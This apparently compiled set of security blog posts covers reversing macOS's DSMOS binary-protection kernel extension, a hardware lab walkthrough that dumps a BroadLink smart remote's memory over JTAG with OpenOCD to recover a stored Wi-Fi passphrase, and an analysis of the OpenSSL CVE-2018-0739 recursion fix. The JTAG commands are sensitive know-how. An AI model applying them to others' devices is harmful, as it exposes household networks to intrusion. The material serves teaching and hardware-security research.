    $ export SHELL=bash
    $ export TERM=xterm-256color
    $ stty rows <num> columns <cols>

Any other cool techniques? Let me know in the comments or hit me up on twitter. Enjoy! -ropnop

Source: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
  22. Reversing a macOS Kernel Extension
Oct 11, 2016 #kernel, #macOS, #lldb, #IDA

In my last post I covered the basics of kernel debugging in macOS. In this post we will put some of that to use and work through the process of reversing a macOS kernel module.

As I said in my last post, in macOS there is a kernel module named “Don’t Steal Mac OS X” (DSMOS) which registers a function with the Mach-O loader to unpack binaries that have the SG_PROTECTED_VERSION_1 flag set on their __TEXT segment. Finder, Dock, and loginwindow are a few examples of binaries that have this flag set. My goal for this post is to simply work through the kernel module with the intent of discovering its functionality and use it as an opportunity to learn a bit about kernel debugging.

If you’d like to follow along, I pulled the DSMOS module off of a laptop running macOS Sierra Beta (16A286a). Based on cursory looks at a couple of copies from different versions of macOS, it hasn’t changed much recently, so you should be able to follow along with a copy from Mac OS X 10.11 or macOS Sierra. As you’ll see in the screenshots, I used IDA Pro for this reversing; however, using a program like Hopper would be fine as well.

First Look

At a glance, the DSMOS kernel module is fairly simple in terms of number of functions. It has 25 functions of which we only really care about 6. Most of the functions we don’t care about are constructors or destructors. Admittedly I haven’t taken the time to understand constructors and destructors used by a kernel module, so I will be skipping them in this post.

Typically when I first look at a binary I start by looking at the strings in the binary.

Figure 1: Strings in DSMOS kernel module

As seen in Figure 1, there really aren’t that many strings and they aren’t all that exciting. The most interesting is probably the string “AppleSMC”, which is an indicator that this module interacts with the System Management Controller.
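For readers without IDA at hand, that first look at strings can be approximated with a short script. The following is a minimal sketch, not what IDA does internally: it assumes plain ASCII strings only, and the function name printable_strings is made up for illustration.

```python
import re


def printable_strings(data: bytes, min_len: int = 4):
    """Yield runs of printable ASCII of at least min_len bytes, similar to strings(1)."""
    # 0x20-0x7e covers space through tilde, i.e. the printable ASCII range.
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for match in pattern.finditer(data):
        yield match.group().decode("ascii")
```

Reading the kernel extension's binary into a bytes object and passing it to printable_strings should surface entries such as AppleSMC, although the exact list depends on the copy of the module being examined.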
Given that there are so few functions in this binary, my approach was to simply go through each of them, have a quick look at the control flow graph (CFG) for a rough estimate of complexity, and put the function either on the “care” or “don’t care” list. Doing this I ended up with 9 functions of interest (see Table 1).

    Address   Name
    00000A9E  sub_A9E
    00000B2A  sub_B2A
    00000D30  sub_D30
    00000E9E  sub_E9E
    0000125A  sub_125A
    00001616  sub_1616
    00001734  sub_1734
    00001C48  sub_1C48
    00001C94  sub_1C94

Table 1: Potentially interesting function addresses and associated names.

With these functions as starting points, the next step is to start working through them. At this point our goal is to identify what functionality each provides.

Registering an IOService Notification Handler

Figure 2: Main block of code in sub_A9E

The relevant block of code from sub_A9E is shown in Figure 2. In words, this function first retrieves a matching dictionary for the AppleSMC service, then installs a notification handler that is called when IOKit detects that a service with the class name AppleSMC has been registered. In the call to IOService::addNotification() shown in Figure 2, the first argument is the address of the handler to be called. This handler is labelled as notificationHanlder in Figure 2 and not listed in Table 1 (it was a false negative); it’s located at address 00000B1A with a default name in IDA of sub_B1A. sub_B1A isn’t all that interesting; all it does is wrap sub_B2A, dropping some arguments in the process.

The Notification Handler

When an IOService registers the AppleSMC class, the code in sub_B2A will be notified. This function begins by calling OSMetaClassBase::safeMetaCast() to cast the incoming service into an AppleSMC service. Note that Apple’s documentation states that developers should not call OSMetaClassBase methods directly and should instead use provided macros.
In this case, the call to safeMetaCast() was likely generated by using the OSDynamicCast macro, which Apple lists as a valid macro to be used by developers. The next block in sub_B2A, shown in Figure 3, is where things actually start.

Figure 3: Querying SMC for key

Since C++ is horribly annoying to reverse due to all the indirect calls, rather than figuring out what method is represented by rax+850h I turned to Google. Searching for OSK0 and OSK1 turns up an article posted by Amit Singh. In it he talks briefly about an older version of the DSMOS kernel extension and also provides code that uses the OSK0 and OSK1 strings to query the SMC for two keys. Once these keys have been acquired, the kernel extension computes a SHA-256 hash and compares it to a value stored in memory. If this comparison fails, an error is printed (not shown). If the hashes match then we skip to the block shown in Figure 4.

Figure 4: Installing DSMOS hook

The first part of this basic block takes the address of byte_3AA4 and our keys returned from the SMC, then calls sub_1616. If you look at sub_1616 you’ll see it contains a couple of loops and a bunch of byte manipulation I didn’t want to reverse. Looking at where byte_3AA4 is used, you’ll see it is used in two places: here in sub_B2A and in sub_D30. Let’s wait a bit to see how it is used before figuring out how it is generated.

After the call to sub_1616 we have two AES decryption keys set. The first key is the value returned from the SMC when queried with OSK0 and the second key is the value returned when OSK1 is used to query the SMC. Finally, we see a global variable named initialized set to 1 and a call to dsmos_page_transform_hook with the address of sub_D30 as a parameter.
    void
    dsmos_page_transform_hook(dsmos_page_transform_hook_t hook)
    {
        printf("DSMOS has arrived\n");
        /* set the hook now - new callers will run with it */
        dsmos_hook = hook;
    }

Listing 1: Source code for dsmos_page_transform_hook from XNU source

Searching for dsmos_page_transform_hook in the XNU source we find the code in Listing 1. This is a pretty simple function that sets the value of dsmos_hook to the provided function address.

Usage of dsmos_hook in XNU

At this point we will briefly step away from IDA and the kernel extension, turning our attention to the XNU source. For this work I used the source of XNU 3248.60.10, which is the version used by Mac OS X 10.11.6. If you haven’t done so already, you can download the source from http://opensource.apple.com/release/os-x-10116/.

As we saw, dsmos_page_transform_hook simply sets the value of dsmos_hook. Continuing from here, we find that dsmos_hook is only used in dsmos_page_transform_hook, as we saw, and in dsmos_page_transform (Listing 2).

    int
    dsmos_page_transform(const void* from, void *to, unsigned long long src_offset, void *ops)
    {
        static boolean_t first_wait = TRUE;

        if (dsmos_hook == NULL) {
            if (first_wait) {
                first_wait = FALSE;
                printf("Waiting for DSMOS...\n");
            }
            return KERN_ABORTED;
        }
        return (*dsmos_hook) (from, to, src_offset, ops);
    }

Listing 2: Usage of dsmos_hook by XNU

After ensuring dsmos_hook is set, the code in Listing 2 just calls the hook with the parameters passed to dsmos_page_transform. This approach allows Apple some flexibility and opens up the opportunity to have multiple hooks in the future.

Once again searching the XNU source, we see that the only use of dsmos_page_transform is in a function called unprotect_dsmos_segment. I have not included the source of unprotect_dsmos_segment since it is a bit longer and also not very exciting. The most interesting part about it is that it checks to see that the segment is long enough before attempting to call dsmos_page_transform on it.
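The register-then-dispatch pattern in Listings 1 and 2 can be modelled in a few lines of Python. This is a toy model for illustration only, not kernel code: KERN_ABORTED is a symbolic stand-in rather than the real constant, and toy_hook is a made-up hook that merely copies bytes.

```python
KERN_ABORTED = "KERN_ABORTED"  # symbolic stand-in, not the real numeric value

_dsmos_hook = None   # mirrors the global dsmos_hook in XNU
_first_wait = True   # mirrors the static first_wait flag


def dsmos_page_transform_hook(hook):
    """Install the hook; later callers of dsmos_page_transform will use it."""
    global _dsmos_hook
    print("DSMOS has arrived")
    _dsmos_hook = hook


def dsmos_page_transform(src, dst, src_offset, ops):
    """Forward to the installed hook, or abort if none is registered yet."""
    global _first_wait
    if _dsmos_hook is None:
        if _first_wait:
            _first_wait = False
            print("Waiting for DSMOS...")
        return KERN_ABORTED
    return _dsmos_hook(src, dst, src_offset, ops)


def toy_hook(src, dst, src_offset, ops):
    """Hypothetical hook: copy the page unchanged and report success (0)."""
    dst[:len(src)] = src
    return 0
```

Before dsmos_page_transform_hook(toy_hook) is called, every dsmos_page_transform call returns the abort value; afterwards the call is forwarded to the hook. In this model, that is the only coupling between the loader side and whatever the kernel extension registers.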
Continuing along, unprotect_dsmos_segment is only called by load_segment. load_segment is a much larger function and is not shown in its entirety, but the relevant portion is shown in Listing 3.

    if (scp->flags & SG_PROTECTED_VERSION_1) {
        ret = unprotect_dsmos_segment(file_start,
                                      file_end - file_start,
                                      vp,
                                      pager_offset,
                                      map,
                                      vm_start,
                                      vm_end - vm_start);
        if (ret != LOAD_SUCCESS) {
            return ret;
        }
    }

Listing 3: Call to unprotect_dsmos_segment from load_segment

The interesting part of the code in Listing 3 is that unprotect_dsmos_segment is only called on segments with the SG_PROTECTED_VERSION_1 flag set. As mentioned earlier, macOS only includes a few binaries with this flag set, such as Finder, Dock, and loginwindow.

The Hook Implementation

At this point we know that the DSMOS kernel extension queries the SMC for a pair of keys, initializes some AES decryption contexts and global variables, then installs a hook by calling dsmos_page_transform_hook. We also know that the Mach-O loader in the kernel will call this hook when it finds a segment with the SG_PROTECTED_VERSION_1 flag set. The next question then is: what does the hook installed by the DSMOS kernel extension actually do?

Figure 5: Main functionality of hook function

Prior to the code shown in Figure 5 is the function prologue and setting of a stack cookie; after the code is the checking of the stack cookie and function epilogue. The code shown starts by checking to see if the initialization flag is set. This is the same initialization flag we saw being set in sub_B2A (see Figure 4). If this flag is not set the function exits; otherwise it enters a series of checks to identify which kernel is calling the hook. Searching the XNU source you can find the constant 0x2e69cf40 in the implementation of unprotect_dsmos_segment as shown in Listing 4.
    struct pager_crypt_info crypt_info;
    crypt_info.page_decrypt = dsmos_page_transform;
    crypt_info.crypt_ops = NULL;
    crypt_info.crypt_end = NULL;
    #pragma unused(vp, macho_offset)
    crypt_info.crypt_ops = (void *)0x2e69cf40;
    vm_map_offset_t crypto_backing_offset;
    crypto_backing_offset = -1; /* i.e. use map entry's offset */

Listing 4: XNU setting value of crypt_info.crypt_ops

As Figure 5 shows, there are three basic cases implemented in the hook: no protection, an old kernel, and a new kernel. The basic block responsible for each case is labelled accordingly. I did not try to figure out which kernels mapped to which version; however, if you read the article by Amit Singh you’ll notice that he talks about the method where each half of the page is encrypted with one of the SMC keys. In our kernel extension this corresponds to the old_kernel basic block.

The method currently in use by Apple starts at the basic block labelled as new_kernel in Figure 5. In it we see an 8 byte buffer is zeroed, then a call is made to a function I’ve called unprotect (named sub_1734 by IDA originally). Looking at the parameters to unprotect we see it takes, among other parameters, the global buffer byte_3AA4 we saw earlier, the source buffer containing the page to be transformed, and the destination buffer to store the transformed page in. This is the point in our reversing where things become very tedious, since Apple has moved away from using AES to encrypt the pages to a custom method composed of many byte operations (e.g. shift left/right, logical/exclusive or).

Unprotecting a Protected Page

To properly set expectations: due to the tedious nature of this protection mechanism, and me being somewhat satisfied with what I’ve learned so far, I did not go through the full exercise of reversing Apple’s “unprotect” method. Originally I had intended to write a program that would be able to apply the transform to a given binary, but that program is only partially completed and does not work.
So, with expectations set sufficiently low, let’s get a feel for the implementation and a couple of ways of approaching it.

First let’s step back briefly. Remember we saw the global variable byte_3AA4 being initialized in sub_B2A and that I had said the code for that was also incredibly tedious? Well, thanks to the ability to dump memory from the kernel through the debugger we don’t need to reverse it at all. We just need to connect to a running kernel and ask it politely.

Dumping byte_3AA4 From a Running Kernel

If you are unclear about how to use the kernel debugger then check out my previous post. To get started, on your remote machine start the debugger by hitting the NMI keys (left command, right command, and power together), then connect to the debugger from your local machine. The following lldb session shows the steps all put together.

    (lldb) kdp-remote 192.168.42.101
    Version: Darwin Kernel Version 16.0.0: Fri Aug 5 19:25:15 PDT 2016; root:xnu-3789.1.24~6/DEVELOPMENT_X86_64; UUID=4F6F13D1-366B-3A79-AE9C-44484E7FAB18; stext=0xffffff802b000000
    Kernel UUID: 4F6F13D1-366B-3A79-AE9C-44484E7FAB18
    Load Address: 0xffffff802b000000
    ...
    Process 1 stopped
    * thread #2: tid = 0x00b8, 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513, name = '0xffffff8037046ee0', queue = '0x0', stop reason = signal SIGSTOP
        frame #0: 0xffffff802b39a3de kernel.development`Debugger [inlined] hw_atomic_sub(delt=1) at locks.c:1513 [opt]
    (lldb) showallkexts
    OverflowError: long too big to convert
    UUID kmod_info address size id refs TEXT exec size version name
    ...
    B97F871A-44FD-3EA4-BC46-8FD682118C79 0xffffff7fadf449a0 0xffffff7fadf41000 0x5000 130 0 0xffffff7fadf41000 0x5000 7.0.0 com.apple.Dont_Steal_Mac_OS_X
    ...
    (lldb) memory read --force --binary --outfile byte_3AA4.bin 0xffffff7fadf44aa4 0xffffff7fadf44aa4+4172
    4172 bytes written to '/Users/dean/Sites/lightbulbone.github.io/byte_3AA4.bin'

We start out by connecting to the remote host using the kdp-remote command. Once everything has loaded we can get the address of the DSMOS kernel extension in memory using the showallkexts command. In my case the base address is 0xffffff7fadf41000. We then read the memory at address 0xffffff7fadf44aa4, which is the extension base address plus the offset of 0x3aa4; we read 4172 bytes since that is the size of the buffer. If you were writing a program to unprotect binaries you could use this extracted binary blob rather than trying to reverse the initialization algorithm.

Emulating the Unprotect Algorithm

Due to the tedious nature of the algorithm used to “unprotect” a page I decided to try using the Unicorn Engine to emulate it. This effort largely failed because it meant I would have to set up memory in Unicorn the same way as it is in the kernel extension and, as I said, the motivation wasn’t quite there. As far as I know this is possible; however, it too can be rather tedious, especially in cases where the algorithm isn’t as self-contained as in this case. Using an IDA plugin such as sk3wldbg may help; however, I was not aware of it at the time.

Reversing the Unprotect Algorithm

In the end I just sat down and started working through the algorithm in IDA. I did begin to write a program to unprotect before my motivation to work through the tedious code fell through the floor. For me, looking at DSMOS was an opportunity to learn what a kernel module I’ve known about for many years actually does, and to become more familiar with the macOS kernel. That being said, a few things are worth pointing out.

Figure 6: Loop found in sub_1734

In Figure 6 a portion of sub_1734 is shown. In it we see the first eight bytes of the from pointer (stored in r14) being used to build a value to pass to sub_125A.
Figure 7: Unrolled loop in sub_125A

And, in Figure 7 we see part of sub_125A. In this part we see the first two iterations of an unrolled loop.

The point of Figures 6 and 7 is to show some common constructs that come up when reversing code. If you’re not familiar with these constructs it may help to write some code yourself and then analyze the binary after compilation.

Summary

The intent of this post was to reverse engineer the DSMOS kernel extension in macOS. The goal was to understand what functionality the DSMOS extension provided to the kernel and to become more familiar with the XNU kernel. We also touched on IOKit briefly as well as a possible application of the Unicorn engine.

If you have any questions or comments, please feel free to reach out to me on Twitter @lightbulbone.

Source: https://lightbulbone.com/posts/2016/10/dsmos-kext/
  23. JTAG on-chip debugging: Extracting passwords from memory
Published 29/03/2018 | By ISA

Following on from my colleague’s post on using UART to root a phone, I look at another of our challenges, whereby sensitive information such as passwords can be extracted from a device’s memory if physical access to the device is acquired.

The goal and target

[Image: BroadLink RM Pro Smart Remote Control]

The target device is the BroadLink RM Pro universal remote control designed for home convenience and automation. This smart remote control can be used to control multiple home appliances through its application. It also allows users to create scenarios whereby multiple actions can be programmed and activated simultaneously. Device setup and functionality are accessed through the BroadLink e-Control application. This application must be running on a device connected to the same Wi-Fi network as the smart remote and the appliance you want to control.

[Image: BroadLink e-Control application]

For the purpose of this challenge, setting up the device is required. In a real scenario, the device would likely already be set up. Start by connecting the smart remote to a Wi-Fi network and entering the Wi-Fi SSID and passphrase within the e-Control application. The application then tries to locate the device within the network and, once it is found, a connection is established.

Now that the smart remote is functional, an attacker who has physical access to the device may attempt to extract configuration or sensitive information loaded in memory. Successfully replicating this attack scenario is the main goal of this challenge.

Taking a look inside

The first step is to investigate the internal components of the device, starting by carefully taking apart the unit. There are three easily removable housing screws situated on the underside of the device. Once opened, we can then identify different points of interest within the device.
These can be internal or external ports, the board’s chips, components, model and serial numbers. Identifying the chip’s model and serial number is essential and will provide us with the information we need in later stages.

[Image: Inside BroadLink RM Pro Smart remote]

Looking for ways to communicate with the device is another key step. When working with embedded architectures, debug interfaces such as UART and JTAG are commonly present and can be used to establish serial connectivity to the device.

JTAG

Joint Test Action Group, or more simply JTAG, is a standardised type of serial communication commonly used by engineers and developers to perform on-board testing or diagnostics of embedded devices, also known as boundary scanning. Another functionality of JTAG, which is seemingly more used today, is CPU level debugging allowing read-write access to registers and memory.

The JTAG interface uses four mandatory connection points, plus an optional fifth, together known as the Test Access Port or TAP. These connection points correspond to the following signals:
- TDI – Test Data In; this signal represents input data sent to the device
- TDO – Test Data Out, which represents output data from the device
- TCK – Test Clock, used to synchronise data from the TMS and TDI (rising edge of Test Clock) and TDO (falling edge of Test Clock)
- TMS – Test Mode Select; this signal is used to control the state of the TAP controller
- TRST – Test Reset; this is an optional signal used for resetting the TAP controller

Identifying JTAG pinouts

The implementation of JTAG is non-standardised, which means that the signal pinouts you may encounter will vary between devices. Aside from the standalone JTAG connection points, commonly seen JTAG interfaces may be a part of a 10 pin, 14 pin, 16 pin or 20 pin header.

[Image: JTAG pinouts]

Looking closely at the device, the five connection points on the corner of the board are the JTAG interface. Using the JTAG’s debugging functionality should enable us to read and write data stored in memory.
Note: Some devices will have JTAG present but their connections will have been disabled before being released into production.

There are various tools available which can be used to identify JTAG signal pinouts, all of which vary in available features and pricing. Common examples are JTAGenum (for Arduino), JTAGulator and Hydrabus, to name a few. For the purpose of this challenge, a JTAGulator is used. The JTAGulator supports a number of functions, including the identification of both UART and JTAG pinouts.

[Figure: The JTAGulator]

Connecting the JTAGulator

The JTAGulator is connected to the smart remote using its lowest-numbered channels (CH0-CH4). The lowest-numbered channels are used because the JTAGulator identifies the signal on each pin by brute force. Restricting the scan to the lowest channels decreases the number of permutations to iterate through and ultimately speeds up the identification process.

[Figure: JTAGulator connected to the device’s JTAG pins]

Once connected, you can control the JTAGulator over its USB connection, which appears as a serial interface. A number of terminal emulators such as PuTTY, Hyperterminal or Minicom can be used to interface with the JTAGulator. In this instance, we will use the ‘screen’ utility, which is installed by default on many Linux distributions. It can be used to establish a serial connection to the JTAGulator via the default ttyUSB0 device on Linux machines. The JTAGulator’s baud rate of 115200 should also be provided, like so:

    $ sudo screen /dev/ttyUSB0 115200

Once a serial connection to the JTAGulator is established, pressing the ‘h’ key shows a list of the JTAG commands available. The first step is to set the target voltage to 3.3V, which is the voltage required by the microprocessor. 3.3V is used by many chips; however, accurate information regarding the operational voltage can be found by looking through the chip’s specification sheet.
Setting the correct voltage is important as an incorrect voltage could damage or destroy the device.

After setting the voltage, the “Identify JTAG pinout (IDCODE Scan)” command can be used to identify JTAG pins. It works by reading the device IDs and identifies the TDO, TMS and TCK signals. To identify the TDI pin, the BYPASS scan is used. When running the scans, enter the number of channels to use as five; this will allow the JTAGulator to use the connections made on channels CH0 to CH4. The scans should complete fairly quickly as there are only five pins exposed on the board, resulting in a lower number of permutations to try. If the JTAG signals sit among other pins on a larger header, the number of permutations, and therefore the duration of the scan, increases.

[Figure: Identifying JTAG pinouts (BYPASS scan)]

The results of the BYPASS scan show us the location of the signal pinouts on the JTAGulator, which correspond to the signal pinouts on the smart remote. You can skip this step entirely if the JTAG pinouts are labelled on the silkscreen print on the board, so do not forget to check both sides of the PCB, as it may save valuable time.

[Figure: JTAG signal pinouts printed underneath the board]

The Shikra

In order for us to get debug access on the smart remote, a JTAG adapter and an on-chip debugging (OCD) system are required. Many devices on the market allow interfacing with JTAG, such as Bus Pirate, Shikra and HydraBus. For this scenario, the Shikra and OpenOCD are used. The Shikra is an FT232H USB device often referred to as the “Swiss army knife of hardware hacking”; this device allows us to connect to a number of data interfaces, including UART, JTAG and SPI. A Shikra can be purchased from Xipiter: https://int3.cc/products/the-shikra.

[Figure: The Shikra]

The following diagram shows the Shikra pinouts for JTAG, which will be used to connect to the board’s corresponding JTAG pinouts. Ensure that the ground (GND) pin is also connected to a ground point on the board.
[Figure: Shikra JTAG connections, from http://www.xipiter.com/uploads/2/4/4/8/24485815/shikra_documentation.pdf]

[Figure: The Shikra giving serial to USB connectivity]

OpenOCD

OpenOCD allows us to perform on-chip debugging of the smart remote via JTAG. On Debian-based Linux systems, you can install the OpenOCD package by running the following command:

    $ sudo apt-get install openocd

In order for us to use OpenOCD, configuration files for both the adapter (Shikra) and the target (smart remote) are required. OpenOCD comes with a number of pre-installed interface and target configuration files; however, the ones required here are not among them. The configuration file for the adapter can be found in Xipiter’s getting started guide for the Shikra.

Shikra OpenOCD configuration file:

    #shikra.cfg
    interface ftdi
    ftdi_vid_pid 0x0403 0x6014
    ftdi_layout_init 0x0c08 0x0f1b
    adapter_khz 2000
    #end shikra.cfg

Obtaining the configuration file for the target was not as straightforward. The configuration file required was not available within the pre-installed configuration files, and attempting to use any of them results in compatibility errors with the device. The approach taken in identifying the appropriate target configuration file involved looking up the microprocessor’s make and model. Using a magnifying glass or a good enough camera, the markings printed on the chip can be read. The chip in question is a Marvell 88MC200, and a simple Google search for this chip and the keyword OpenOCD returns the target configuration needed:
    #
    # Marvell's Wireless Microcontroller Platform (88MC200)
    #
    # https://origin-www.marvell.com/microcontrollers/wi-fi-microcontroller-platform/
    #

    #source [find interface/ftdi/mc200.cfg]

    if { [info exists CHIPNAME] } {
       set _CHIPNAME $CHIPNAME
    } else {
       set _CHIPNAME mc200
    }

    set _ENDIAN little

    # Work-area is a space in RAM used for flash programming
    # By default use 16kB
    if { [info exists WORKAREASIZE] } {
       set _WORKAREASIZE $WORKAREASIZE
    } else {
       set _WORKAREASIZE 0x4000
    }

    # JTAG scan chain
    if { [info exists CPUTAPID ] } {
       set _CPUTAPID $CPUTAPID
    } else {
       set _CPUTAPID 0x4ba00477
    }

    jtag newtap $_CHIPNAME cpu -irlen 4 -ircapture 0x1 -irmask 0xf -expected-id $_CPUTAPID

    set _TARGETNAME $_CHIPNAME.cpu
    target create $_TARGETNAME cortex_m -endian $_ENDIAN -chain-position $_TARGETNAME

    $_TARGETNAME configure -work-area-phys 0x2001C000 -work-area-size $_WORKAREASIZE -work-area-backup 0

    # Flash bank
    set _FLASHNAME $_CHIPNAME.flash
    flash bank $_FLASHNAME mrvlqspi 0x0 0 0 0 $_TARGETNAME 0x46010000

    # JTAG speed should be <= F_CPU/6. F_CPU after reset is 32MHz
    # so use F_JTAG = 3MHz
    adapter_khz 3000

    adapter_nsrst_delay 100
    if {[using_jtag]} {
     jtag_ntrst_delay 100
    }

    if {![using_hla]} {
       # if srst is not fitted use SYSRESETREQ to
       # perform a soft reset
       cortex_m reset_config sysresetreq
    }

The above configuration file originally sourced an interface file (the “source [find interface/ftdi/mc200.cfg]” line), which is not required and has therefore been commented out. The Shikra configuration file saved earlier is used instead, with its location passed as a command-line argument to OpenOCD. Once both target and interface configuration files are saved locally, run the following OpenOCD command:
    $ openocd -f /usr/share/openocd/scripts/interface/shikra.cfg -f /usr/share/openocd/scripts/target/mc200.cfg

The first -f argument points to shikra.cfg, which contains the interface configuration; the second points to mc200.cfg, which contains the target board configuration. The on-chip debugger should now be running and listening on local port 4444 on your system. You can then simply connect to this port with Telnet:

    $ telnet localhost 4444

Dumping the device memory

Once connected, debug access to the board is possible and allows control of registers and memory addresses. Before the registers can be accessed, a halt request must be sent to put the target into a debugging state. After sending the halt request, the reg command is used to view all of the available registers on the device’s CPU and their values. The full list of useful commands is available in the OpenOCD documentation.

[Figure: Register values shown in OpenOCD]

Highlighted in the above image is the Stack Pointer (SP) register. Discussing how computer addressing works is beyond the scope of this blog (it is not a simple subject!). For now, it is enough to understand that the Stack Pointer holds the address of the last value pushed onto the stack in memory (RAM), and it serves here as the starting address from which memory is read.

Going back to the original goal of extracting sensitive information from the device, the “dump_image” command can be used to dump memory content to a file. To dump as much information as possible, a trial-and-error approach can be taken to identify the boundaries of the readable memory. The dump_image command is entered in the OpenOCD Telnet session as follows:

    > dump_image img_out2 0x20002898 120000

The img_out2 argument is the output filename; the next argument is the Stack Pointer address, and the last is the amount of memory to dump in bytes.

[Figure: Dumping memory to a file]

The image above shows that initial attempts at dumping memory may fail if more bytes are requested than are available.
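
The trial-and-error search for the largest size that can be dumped can be made systematic with a binary search. The following Python sketch is only an illustration under stated assumptions: `try_dump` is a hypothetical callable that would issue dump_image through the Telnet session and report whether it succeeded, and the search assumes that if a given size can be read from the start address then every smaller size can be read as well. No real device is contacted here; `make_fake_target` and the 50,000-byte region are made up purely so the example runs on its own.

```python
def largest_readable_size(try_dump, start, upper_bound):
    """Binary-search the largest size for which try_dump(start, size) succeeds.

    Assumes monotonic behaviour: if a size succeeds, all smaller sizes do too.
    """
    lo, hi = 0, upper_bound  # lo is always a known-good size, hi the largest candidate
    while lo < hi:
        mid = (lo + hi + 1) // 2  # round up so the loop always makes progress
        if try_dump(start, mid):
            lo = mid       # mid bytes were readable, try more
        else:
            hi = mid - 1   # mid bytes failed, try fewer
    return lo


def make_fake_target(region_end):
    """Stand-in for a real target: reads succeed only below region_end."""
    def try_dump(start, size):
        return start + size <= region_end
    return try_dump


START = 0x20002898            # the start address used in the post
FAKE_REGION_BYTES = 50_000    # invented for this simulation, not measured
fake = make_fake_target(START + FAKE_REGION_BYTES)

size = largest_readable_size(fake, START, 1 << 20)
print(size)
```

Against the simulated target this needs about twenty attempts to cover a one-megabyte search range, rather than guessing sizes by hand.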
After successfully dumping the contents of memory to a file, the file can be analysed to identify any information that might be of interest.

[Figure: Wi-Fi passphrase next to the SSID]

A hex editor of your choice can be used to navigate around the contents of the file; in the example above, we have used Ghex. By looking around the file and performing a quick search, we can find the name of the SSID the device is connected to. The passphrase appears 18 bytes after it. If we had purchased this device second-hand, then we could potentially use it to access someone’s home network and launch further attacks.

Conclusion

Cyber attacks on smart home devices should now be recognised as a real threat by home consumers. On the other hand, manufacturers should consider methods for securing the hardware, the very foundation of these devices, to ensure the security and privacy of their users.

Cisco’s hardware hacking challenges give us the opportunity to learn different methods to tamper with or attack a device, therefore promoting a greater understanding of the security risks and controls they present. This post has presented a simple proof-of-concept attack on a consumer smart device, whereby a user’s Wi-Fi passphrase can be extracted, allowing an attacker to achieve persistent access to a victim’s network.

This type of attack can be prevented by disabling or, more effectively, completely removing the JTAG ports from production devices, thereby minimising their attack surface.

Source: https://labs.portcullis.co.uk/blog/jtag-on-chip-debugging-extracting-passwords-from-memory/
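
The manual hex-editor search described in the post above (find the SSID, then read what follows it) can also be scripted. The Python sketch below is a hedged illustration rather than the author's method: the function name `strings_after`, the 64-byte window and the sample bytes are all assumptions made for this example, and the dump is synthetic. The default minimum length of 8 reflects the shortest passphrase WPA/WPA2-PSK allows.

```python
import re


def strings_after(dump, marker, window=64, min_len=8):
    """Return (offset, text) for printable ASCII runs of at least min_len
    characters found within `window` bytes after each occurrence of marker."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    results = []
    pos = dump.find(marker)
    while pos != -1:
        start = pos + len(marker)
        chunk = dump[start:start + window]
        for match in pattern.finditer(chunk):
            results.append((start + match.start(), match.group().decode("ascii")))
        pos = dump.find(marker, pos + 1)
    return results


# Synthetic stand-in for a memory dump: an SSID, 18 padding bytes, then a
# passphrase. These values are invented and do not come from the device.
sample = (
    b"\x00" * 16
    + b"HomeNet"
    + b"\x00" * 18
    + b"correct-horse-battery"
    + b"\x00" * 8
)

print(strings_after(sample, b"HomeNet"))
```

For a real dump, the bytes would instead be read from the output file (img_out2 in the post) opened in binary mode, and the marker would be the SSID of the network under test.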
  24. CVE-2018-0739: OpenSSL ASN.1 stack overflow

This was a vulnerability discovered by Google’s OSS-Fuzz project, and it was fixed by Matt Caswell of the OpenSSL development team. The vulnerability affects OpenSSL releases prior to 1.0.2o and 1.1.0h. Based on the OpenSSL team’s assessment, it cannot be triggered via SSL/TLS, but constructed ASN.1 types that support recursive definitions, such as PKCS7, can be used to trigger it.

    /*
     * Decode an item, taking care of IMPLICIT tagging, if any. If 'opt' set and
     * tag mismatch return -1 to handle OPTIONAL
     */

    static int asn1_item_embed_d2i(ASN1_VALUE **pval, const unsigned char **in,
                                   long len, const ASN1_ITEM *it,
                                   int tag, int aclass, char opt, ASN1_TLC *ctx)
    {
        const ASN1_TEMPLATE *tt, *errtt = NULL;
        const ASN1_EXTERN_FUNCS *ef;
        const ASN1_AUX *aux = it->funcs;
        ASN1_aux_cb *asn1_cb;
        const unsigned char *p = NULL, *q;
        unsigned char oclass;
        char seq_eoc, seq_nolen, cst, isopt;
        long tmplen;
        int i;
        int otag;
        int ret = 0;
        ASN1_VALUE **pchptr;
        if (!pval)
            return 0;
        if (aux && aux->asn1_cb)
            asn1_cb = aux->asn1_cb;
        else
            asn1_cb = 0;

        switch (it->itype) {
          ...
        return 0;
    }

What you see above is a snippet of crypto/asn1/tasn_dec.c, where the ASN.1 decoding function asn1_item_embed_d2i() is located. Neither this function nor any of its callers had any check for recursive definitions. This means that, given a malicious PKCS7 file, this decoding routine will keep recursing into the nested structures until the process runs out of stack space.

To fix this, a new error case named ASN1_R_NESTED_TOO_DEEP was added to the crypto/asn1/asn1.h header file. If we have a look at crypto/asn1/asn1_err.c, we can see that the new error code maps to the “nested too deep” error message.
      {ERR_REASON(ASN1_R_NESTED_ASN1_STRING), "nested asn1 string"},
    + {ERR_REASON(ASN1_R_NESTED_TOO_DEEP), "nested too deep"},
      {ERR_REASON(ASN1_R_NON_HEX_CHARACTERS), "non hex characters"},

Similarly, a new constant (ASN1_MAX_CONSTRUCTED_NEST) was added, which defines the maximum number of recursive invocations of the asn1_item_embed_d2i() function. You can see the new definition in crypto/asn1/tasn_dec.c.

    #include <openssl/err.h>

    /*
     * Constructed types with a recursive definition (such as can be found in PKCS7)
     * could eventually exceed the stack given malicious input with excessive
     * recursion. Therefore we limit the stack depth. This is the maximum number of
     * recursive invocations of asn1_item_embed_d2i().
     */
    #define ASN1_MAX_CONSTRUCTED_NEST 30

    static int asn1_check_eoc(const unsigned char **in, long len);

Lastly, the asn1_item_embed_d2i() function itself was modified to take a new integer argument, “depth”, which is incremented on each recursive invocation. You can see how the check is performed before entering the switch clause here.

            asn1_cb = 0;

        if (++depth > ASN1_MAX_CONSTRUCTED_NEST) {
            ASN1err(ASN1_F_ASN1_ITEM_EMBED_D2I, ASN1_R_NESTED_TOO_DEEP);
            goto err;
        }

        switch (it->itype) {
        case ASN1_ITYPE_PRIMITIVE:

Similarly, all calling functions in OpenSSL have been updated to ensure that the new argument is used as intended. The official security advisory describes the above vulnerability like this.

Constructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739)
==========================================================================================

Severity: Moderate

